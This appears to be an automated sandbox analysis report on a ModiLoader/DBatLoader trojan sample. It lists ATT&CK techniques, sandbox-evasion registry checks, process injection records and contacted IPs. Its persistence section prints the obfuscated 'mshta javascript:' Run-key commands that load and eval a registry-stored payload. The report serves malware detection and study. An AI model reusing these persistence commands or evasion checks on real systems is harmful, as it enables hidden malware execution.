Malware Analysis Report

2024-08-06 14:39

Sample ID 240524-l9b4psdd5v
Target ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe
SHA256 ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b

Threat Level: Known bad

The file ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Checks for common network interception software

ModiLoader Second Stage

Looks for VirtualBox Guest Additions in registry

Looks for VMWare Tools registry key

Adds policy Run key to start application

Checks BIOS information in registry

Deletes itself

Adds Run key to start application

Maps connected drives based on registry

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Virtualization/Sandbox Evasion
T1497
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Software Discovery
T1518
Query Registry
T1012
Virtualization/Sandbox Evasion
T1497
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-24 10:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-24 10:13

Reported

2024-05-24 10:16

Platform

win7-20240221-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:g1hNNGwv=\"qT\";nj84=new%20ActiveXObject(\"WScript.Shell\");FuGVSCf2=\"0Zq4\";S1RKg1=nj84.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\369ddf2b1c\\\\7856548a\");MjPJIK28n=\"L\";eval(S1RKg1);jGEVFv3=\"UL\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:ub12jJXJ=\"qWbpz\";Dx92=new%20ActiveXObject(\"WScript.Shell\");KtUA2vO3=\"y82PzI\";lO5fV=Dx92.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\369ddf2b1c\\\\7856548a\");e5XsIUxA=\"luZ8Ae\";eval(lO5fV);fnHVEp1=\"b0\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:qeKwJcM8=\"XMya\";AL6=new%20ActiveXObject(\"WScript.Shell\");njUsE0T=\"RQKJS0\";y0zlJ=AL6.RegRead(\"HKCU\\\\software\\\\369ddf2b1c\\\\7856548a\");WP3YHAiqR=\"PYHl\";eval(y0zlJ);LGGy69Ps=\"oU\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2512 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2328 wrote to memory of 2584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2328 wrote to memory of 2584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2328 wrote to memory of 2584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2328 wrote to memory of 2584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2328 wrote to memory of 2584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2328 wrote to memory of 2584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2328 wrote to memory of 2584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 2692 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 2692 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 2692 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 2692 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 2692 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 2692 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 2692 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 3020 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 3020 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 3020 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 3020 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 3020 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 3020 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 3020 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe

"C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
CH 85.5.49.21:80 tcp
JP 218.228.21.45:8080 tcp
US 6.23.91.53:80 tcp
JP 27.113.222.86:80 tcp
US 15.244.216.113:80 tcp
CN 101.85.117.213:80 tcp
AR 191.81.111.125:80 tcp
N/A 10.195.137.24:443 tcp
SE 213.115.57.158:80 tcp
US 11.153.99.91:80 tcp
DE 149.231.165.101:80 tcp
US 69.46.137.150:80 tcp
CN 219.223.76.22:80 tcp
US 22.195.38.185:80 tcp
CN 175.51.1.153:80 tcp
JP 153.132.223.5:80 tcp
GB 18.133.53.250:80 tcp
IT 88.49.6.58:80 tcp
DE 185.141.102.244:80 tcp
US 214.63.195.16:80 tcp
CN 42.161.243.253:80 tcp
PH 222.127.77.26:80 tcp
US 72.8.76.255:80 tcp
US 8.58.255.77:80 tcp
CN 210.34.60.106:443 tcp
IT 151.71.144.224:80 tcp
US 214.125.121.243:443 tcp
GB 92.20.89.216:80 tcp
US 184.52.154.216:80 tcp
US 72.149.218.20:80 tcp
US 68.119.202.172:80 tcp
US 52.33.192.101:80 tcp
CN 114.225.11.136:80 tcp
JP 101.143.250.191:80 tcp
US 107.9.205.50:80 tcp
JP 121.110.206.87:80 tcp
CA 138.82.5.162:80 tcp
US 67.198.55.194:80 tcp
US 74.45.67.29:80 tcp
CA 142.67.70.191:80 tcp
AE 92.98.204.9:80 tcp
CN 175.167.110.204:80 tcp
US 30.136.157.226:80 tcp
CN 182.113.52.180:80 tcp
TW 163.14.151.225:80 tcp
NL 83.82.51.159:8080 tcp
CN 125.81.131.77:80 tcp
RU 46.46.4.109:80 tcp
US 17.133.249.166:80 tcp
KR 58.65.85.160:8080 tcp
MX 201.147.19.205:8080 tcp
US 16.74.151.28:80 tcp
FR 144.56.8.80:80 tcp
US 44.19.192.91:80 tcp
CN 116.207.40.115:80 tcp
SA 176.17.162.91:80 tcp
US 55.221.125.15:80 tcp
US 8.6.77.144:80 tcp
UA 109.254.149.42:80 tcp
CA 142.51.11.17:443 tcp
HN 181.210.157.60:80 tcp
MX 189.144.173.183:80 tcp
US 207.205.51.167:80 tcp
DZ 197.206.167.189:80 tcp
AE 77.242.245.180:8080 tcp
US 18.207.57.110:80 tcp
HK 218.191.235.121:80 tcp
US 18.96.45.125:80 tcp
FR 109.24.33.252:443 tcp
US 173.17.71.196:80 tcp
JP 210.254.109.139:80 tcp
CA 24.122.197.89:8080 tcp
US 18.38.120.85:80 tcp
GB 79.77.160.97:80 tcp
CN 14.25.182.199:80 tcp
FI 195.156.126.155:80 tcp
JP 180.19.196.153:443 tcp
US 23.176.220.84:80 tcp
CN 111.175.7.22:80 tcp
KR 183.99.60.248:80 tcp
US 50.161.172.73:443 tcp
N/A 127.200.213.255:443 tcp
US 13.188.192.61:80 tcp
ZA 196.48.230.59:80 tcp
US 3.186.11.184:80 tcp
JP 36.15.174.89:80 tcp
SG 43.21.196.3:80 tcp
TW 39.13.158.191:80 tcp
CN 211.94.255.139:8080 tcp
SE 143.217.128.134:8080 tcp
US 19.205.107.101:8080 tcp
US 97.200.23.55:80 tcp
US 12.145.128.192:80 tcp
US 65.41.249.70:80 tcp
FR 86.233.225.85:8080 tcp
US 140.60.45.59:80 tcp
CN 49.77.3.244:80 tcp
US 68.90.122.35:80 tcp
CN 211.153.115.72:80 tcp
US 143.170.126.50:80 tcp
VN 171.250.162.62:443 tcp
US 208.243.159.148:443 tcp
ZM 102.149.76.146:80 tcp
US 204.31.3.73:80 tcp
US 6.75.197.49:80 tcp
UA 46.211.23.184:80 tcp
CN 111.54.111.10:80 tcp
US 108.61.46.183:80 tcp
CN 124.162.142.176:80 tcp
KR 114.206.254.173:80 tcp
US 206.56.118.112:80 tcp
KR 183.112.24.64:443 tcp
ES 194.93.92.183:443 tcp
US 140.192.1.238:80 tcp
US 23.231.45.160:443 tcp
BR 4.228.88.226:443 tcp
US 167.29.201.180:80 tcp
IN 106.193.164.139:80 tcp
US 216.75.79.35:80 tcp
BR 179.192.191.254:443 tcp
CN 175.169.31.158:80 tcp
US 170.166.164.22:80 tcp
US 167.133.4.16:80 tcp
US 56.65.183.143:80 tcp
VN 115.77.153.65:80 tcp
TW 1.200.218.157:80 tcp
CA 24.36.95.103:80 tcp
US 208.136.122.167:443 tcp
US 155.21.172.183:80 tcp
CN 1.182.21.98:80 tcp
US 130.191.16.27:8080 tcp
US 12.68.58.142:443 tcp
US 207.243.223.234:443 tcp
BR 186.218.99.82:443 tcp
DZ 154.254.116.192:80 tcp
GB 197.231.165.175:80 tcp
GB 25.26.5.119:80 tcp
AU 120.20.186.253:80 tcp
IR 5.209.249.202:8080 tcp
US 75.190.23.30:80 tcp
US 47.147.153.131:80 tcp
VN 171.234.158.9:443 tcp
IT 93.38.166.190:443 tcp
US 38.227.22.227:80 tcp
DE 109.199.97.79:80 tcp
CN 36.110.156.25:80 tcp
US 198.207.3.15:80 tcp
US 17.244.6.148:80 tcp
DE 149.214.118.108:80 tcp
JP 124.212.53.168:80 tcp
US 170.57.80.64:80 tcp
NL 77.250.96.216:80 tcp
SG 43.156.92.93:80 tcp
US 159.227.93.19:443 tcp
US 13.85.230.32:80 tcp
SG 47.129.12.14:80 tcp
US 192.221.7.68:80 tcp
US 104.172.241.212:80 tcp
NL 145.142.6.121:80 tcp
IN 128.185.178.180:80 tcp
CN 123.157.173.45:80 tcp
CN 115.149.226.72:80 tcp
CA 50.92.237.121:80 tcp
US 19.193.54.107:80 tcp
CN 14.215.201.109:80 tcp
US 7.167.141.43:80 tcp
CN 120.199.97.122:80 tcp
NL 145.115.86.183:80 tcp
CZ 85.163.148.167:80 tcp
US 68.184.206.79:80 tcp
CN 59.225.153.170:80 tcp
US 198.31.129.13:80 tcp
US 107.55.73.66:80 tcp
US 33.137.31.2:80 tcp
JP 141.178.136.34:80 tcp
US 68.212.109.249:80 tcp
DK 85.191.253.82:80 tcp
JP 60.117.127.255:80 tcp
CN 59.215.219.149:80 tcp
RU 81.25.50.242:80 tcp
US 34.189.9.41:80 tcp
CN 59.216.1.102:80 tcp
MA 102.103.206.101:80 tcp
US 74.47.220.239:80 tcp
US 169.119.225.196:443 tcp
GB 25.167.230.157:80 tcp
US 207.46.185.242:80 tcp
US 152.160.176.159:80 tcp
RU 95.137.44.181:8080 tcp
EG 154.143.100.66:80 tcp
TR 46.1.37.54:8080 tcp
ID 120.188.11.97:80 tcp
US 205.67.194.100:80 tcp

Files

memory/2512-0-0x0000000001EF0000-0x0000000001F60000-memory.dmp

memory/2512-1-0x0000000000330000-0x0000000000331000-memory.dmp

memory/2512-2-0x0000000001EF0000-0x0000000001F60000-memory.dmp

memory/2512-3-0x0000000000400000-0x000000000048C000-memory.dmp

memory/2512-5-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2512-8-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2512-9-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2512-7-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2512-6-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2512-12-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2512-17-0x0000000000400000-0x000000000048C000-memory.dmp

memory/2328-15-0x00000000007B0000-0x00000000007B7000-memory.dmp

memory/2328-19-0x00000000007B0000-0x00000000007B7000-memory.dmp

memory/2328-20-0x00000000001F0000-0x00000000002BC000-memory.dmp

memory/2328-22-0x00000000001F0000-0x00000000002BC000-memory.dmp

memory/2328-24-0x00000000001F0000-0x00000000002BC000-memory.dmp

memory/2328-23-0x00000000001F0000-0x00000000002BC000-memory.dmp

memory/2328-21-0x00000000001F0000-0x00000000002BC000-memory.dmp

memory/2328-26-0x00000000001F0000-0x00000000002BC000-memory.dmp

memory/2584-35-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-40-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-38-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-39-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-41-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-45-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-47-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-46-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-48-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-44-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-43-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-42-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-37-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-36-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-49-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2692-53-0x00000000001D0000-0x000000000029C000-memory.dmp

memory/2692-58-0x00000000001D0000-0x000000000029C000-memory.dmp

memory/2692-57-0x00000000001D0000-0x000000000029C000-memory.dmp

memory/2692-56-0x00000000001D0000-0x000000000029C000-memory.dmp

memory/2692-55-0x00000000001D0000-0x000000000029C000-memory.dmp

memory/2692-54-0x00000000001D0000-0x000000000029C000-memory.dmp

memory/2584-59-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/2584-60-0x00000000001A0000-0x000000000026C000-memory.dmp

memory/3020-65-0x0000000000220000-0x00000000002EC000-memory.dmp

memory/3020-67-0x0000000000220000-0x00000000002EC000-memory.dmp

memory/3020-68-0x0000000000220000-0x00000000002EC000-memory.dmp

memory/3020-66-0x0000000000220000-0x00000000002EC000-memory.dmp

memory/3020-64-0x0000000000220000-0x00000000002EC000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-24 10:13

Reported

2024-05-24 10:16

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
